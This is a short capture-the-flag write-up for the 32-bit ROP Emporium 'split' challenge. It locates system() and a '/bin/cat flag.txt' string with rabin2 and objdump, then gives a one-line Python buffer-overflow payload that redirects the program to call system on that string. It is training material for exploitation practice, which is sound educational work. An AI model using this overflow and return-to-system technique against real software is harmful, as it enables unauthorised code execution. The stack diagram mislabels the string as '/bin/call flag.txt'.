split
=====

Get the 32-bit `split` binary from the
[URL on ropemporium.com](https://ropemporium.com/binary/split32.zip):

    curl -O https://ropemporium.com/binary/split32.zip
    unzip split32.zip

This time, we need to call `system()` with a pointer to the string
`/bin/cat flag.txt` as an argument. Conveniently, a call to `system()` and the
required string are both included in the binary:

    $ rabin2 -i split32 | grep system
    ordinal=004 plt=0x08048430 bind=GLOBAL type=FUNC name=system

    $ rabin2 -z split32 | grep flag.txt
    vaddr=0x0804a030 paddr=0x00001030 ordinal=000 sz=18 len=17 section=.data type=ascii string=/bin/cat flag.txt

We already have a pointer to the string we need, so we just need a pointer to
the call to `system()`:

    $ objdump -d split32 | grep -e 'call.*system'
    8048657:       e8 d4 fd ff ff          call   8048430 <system@plt>

We want the stack to look like this when `pwnme()` executes its `ret`, so that
when EIP gets popped, the address of our string is its first argument:

    +------------+
    | 0x0804a030 | <-- address of "/bin/call flag.txt"
    +------------+
    | 0x08048657 | <-- address of `call system@plt`
    +------------+ <-- current ESP

The stack looks just like it did in the `ret2win` level, so we just need 44B of
padding, followed by the byteswapped addresses of the call and the string:

    python -c 'print("A"*44 + "\x57\x86\x04\x08" + "\x30\xa0\x04\x08")' | ./split32
